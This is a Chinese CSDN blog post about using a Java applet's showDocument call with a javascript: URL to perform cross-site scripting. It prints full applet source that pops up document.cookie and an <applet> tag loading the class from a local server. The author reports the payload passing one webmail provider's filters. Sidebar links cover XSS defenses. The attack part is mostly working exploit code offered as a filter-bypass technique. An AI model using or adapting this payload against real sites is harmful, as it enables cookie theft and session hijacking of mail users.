A new way to xss with java applet

最新推荐文章于 2021-02-21 13:01:35 发布
最新推荐文章于 2021-02-21 13:01:35 发布
阅读量395 收藏
点赞数
分类专栏: security 文章标签: java applet xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyarno/article/details/45770565
版权

A new way to xss with java applet (很早以前写的文章,拿出来先放个1楼)

一、java Applet介绍

CVE2012-4681 使我关注到了java applet,简单介绍一下java applet其实类似于FLASH是浏览器一个组件(插件),和微软的ActiveX插件相似。详细的可以参考百度百科:

 Applet可以翻译为小应用程序,Java Applet就是用Java语言编写的这样的一些小应用程序,它们可以直接嵌入到网页中,并能够产生特殊的效果。包含Applet的网页被称为Java-powered页,可以称其为Java支持的网页。

  当用户访问这样的网页时, Applet被下载到用户的计算机上执行,但前提是用户使用的是支持Java的网络l浏览器。由于Applet是在用户的计算机上执行的,因此它的执行速度不受网络带宽或者Modem存取速度的限制。用户可以更好地欣赏网页上Applet产生的多媒体效果。

二、java applet执行JavaScript代码

Java applet提供了执行了javascript代码的接口,通过调用applet的getAppletContext()方法返回Context对象,然后再次调用Context的showDocument方法通过javascript:jscode执行javascript代码,相关代码如下:

package bug.applet;
import java.applet.*;
import java.awt.Graphics;
import java.net.*;

public class AppletXss extends Applet {
   public void init(){
         SecurityManager sm=System.getSecurityManager();
         sm.getSecurityContext();
         xss();
       }

    public void paint(Graphics paramGraphics,String message) {
          paramGraphics.drawString("Loading", 50, 25);
         }

    public void xss(){
        try {
        URL url = new URL("javascript:document.writeln('<script>alert(document.cookie);alert(/xss/);</script>')");
        getAppletContext().showDocument(url);
     } catch(MalformedURLException e) {
      paint(this.getGraphics(),"不支持JavaScript调用!");
    }
  }
 }

Xss payload调用代码:

<applet codebase="http://192.168.56.1/"   code="bug/applet/AppletXss.class" width=500 height=300></applet>

AppletXss.class,放在192.168.56.1的根目录下的bug/applet目录下。

测试了下威力目前139邮箱可以通过,126被转义了,qq直接把applet标签弄死了。算是一种构造xss的新方法吧。
XSS攻击展示:

heyarno
关注
专栏目录
Java代码审计】XSS
大河之犬的博客
12-16 2万+
XSS 漏洞是指攻击者在网页中嵌入客户端脚本(通常是 JavaScript 编写的恶意代码),进而执行其植入代码的漏洞。若 Web 应用未对用户可直接或间接控制的“输入”与“输出”参数进行关键字过滤或转义处理,则很可能存在跨站脚本漏洞。从 Web 应用上来看,攻击者可以控制的参数包括 URL 参数、post 提交的表单数据以及搜索框提交的搜索关键字,一般对该漏洞的审计策略如下收集输入、输出点查看输入、输出点的上下文环境。判断 Web 应用是否对输入、输出做了防御工作(如过滤、扰乱以及编码)
Java 防御XSS攻击实战与示例代码
oscar999的专栏
01-08 1694
本篇介绍在Java 项目中如何快速修复XSS 漏洞。本篇使用的是黑名单的方式, 对于非法字符进行转义。 黑名单的方式虽然不能完全的解决XSS的漏洞, 但是能有效的减轻攻击, 对于使用类似Coverity等代码静态扫描攻击扫描的漏洞, 修复之后就不会再报相关的警报了。
java的xxsProtect过滤xss
05-19
java过滤xss工具,xxsProtect. 根目录XSS/bin文件夹下有所有的jar包. 根目录XSS/com/start.java文件是例子. 过滤字符串中至少要有html显示标签.
APPLET AND XSS THE MAIL
Information Security Technology Organization
12-04 2910
AUTHOR : KJ021320TEAM : I.S.T.OBLOG : blog.csdn.net/kj021320在APPLET中其实可以运行JAVASCRIPT 而 JS中又可以获取COOKIE,添加IFRAME等然而我们就可以采用这样的方式绕过某些过滤器去XSS EMAIL了!晚饭的时候跟 刺他们讨论了一下~~偶感觉局限性很大 所以扔出来 抛砖引玉看看有没有人可以有更好的利用方式1。
Java防止xss攻击
VicCreator
03-29 3797
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml XssEscape www.ablanxue.com.filter.XssFilter XssEscape /*
mysql防止xss攻击_java 防止 XSS 攻击的常用方法总结
weixin_32597695的博客
01-28 335
在前面的一篇文章中,讲到了java web应用程序防止 csrf 攻击的方法,参考这里java网页程序采用 spring 防止 csrf 攻击.,但这只是攻击的一种方式,还有其他方式,比如今天要记录的 XSS 攻击, XSS 攻击的专业解释,可以在网上搜索一下,参考百度百科的解释http://baike.baidu.com/view/2161269.htm, 但在实际的应用中如何去防止这种攻击呢,...
XSS过滤JAVA过滤器filter 防止常见SQL注入
weixin_34092370的博客
04-08 384
出处: https://www.cnblogs.com/hero123/p/9091625.html Java项目中XSS过滤器的使用方法。 简单介绍: XSS : 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
Java防止xss攻击附相关文件下载
08-25
Java防止XSS攻击的核心策略是确保用户输入的数据在显示到网页上之前被适当地编码、转义或过滤,以防止恶意脚本被执行。XSS(跨站脚本)攻击是由于网页应用程序未能正确处理用户输入的数据,使得攻击者能够注入恶意...
基于Java的高级XSS攻击过滤器设计源码
最新发布
04-08
高级XSS攻击过滤器 - 基于Java开发,包含33个文件,如XML、JAVA、GITIGNORE、NAME和IML等。该系统实现了一个有选择地过滤XSS攻击代码的功能,通过Java技术实现界面交互和功能模块,为用户提供了一个高效、安全的XSS...
防止XSS攻击xssProtect用到的jar包(antlr-3.0.1,antlr-runtime-3.0.1,xssProtect-0.1)
03-02
防止XSS攻击xssProtect用到的jar包(antlr-3.0.1,antlr-runtime-3.0.1,xssProtect-0.1)
xssProtect-0.1.jar
11-19
xssProtect-0.1.jar 谷歌开源代码工具 、 用于XSS攻击
JAVA防止XSS注入,附jar包
05-19
防止xss注入,有antlr-runtime和xssProtect两个jar包,及相关的filter过滤器。
Java防止xss攻击jar包
03-29
Java防止xss攻击依赖jar包
XSS跨站脚本攻击在Java开发中防范的方法
01-09
XSS跨站脚本攻击在Java开发中防范的方法
java xssprotect_XSSxssprotect(转)
weixin_32620265的博客
02-21 209
/***Copyright2008GerardToonstra**Asanexception,thisparticularfile*intheprojectispublicdomaintoallowtotally*freederivationsofthiscode.**/packagecom.blogspot.radialmind.xss;impo...
java xssprotect使用_xssProject在java web项目中应用
weixin_39926103的博客
02-13 107
public class XssHttpServletRequestWrapper extendsHttpServletRequestWrapper{HttpServletRequest orgRequest= null;publicXssHttpServletRequestWrapper(HttpServletRequest request){super(request);orgRequest=...
java xssprotect使用_java 拦截器解决xss攻击
weixin_28788593的博客
02-13 1115
一、xss攻击XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内...
java怎么设置 x-xss-protection_JAVA程序猿萌新起步
weixin_33547353的博客
11-30 1206
现在JAVA很火,需求量大,就业也很容易,如果技术过硬的话月薪上万也是可以的。由于我是朝8晚5的工作压力也不是很大,所以最近准备学习下JAVA。当然不是为了跳槽,只是想拓宽下知识面,提高自我价值。既然要学习JAVA,那么编程环境总是要有的。目前的常见的就是安装JDK+eclipse。今天主要来分享下怎么搭建JDK环境吧。1.下载安装包JDK网上有很多免费的安装包,根据自己电脑配置看是下载32位的还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值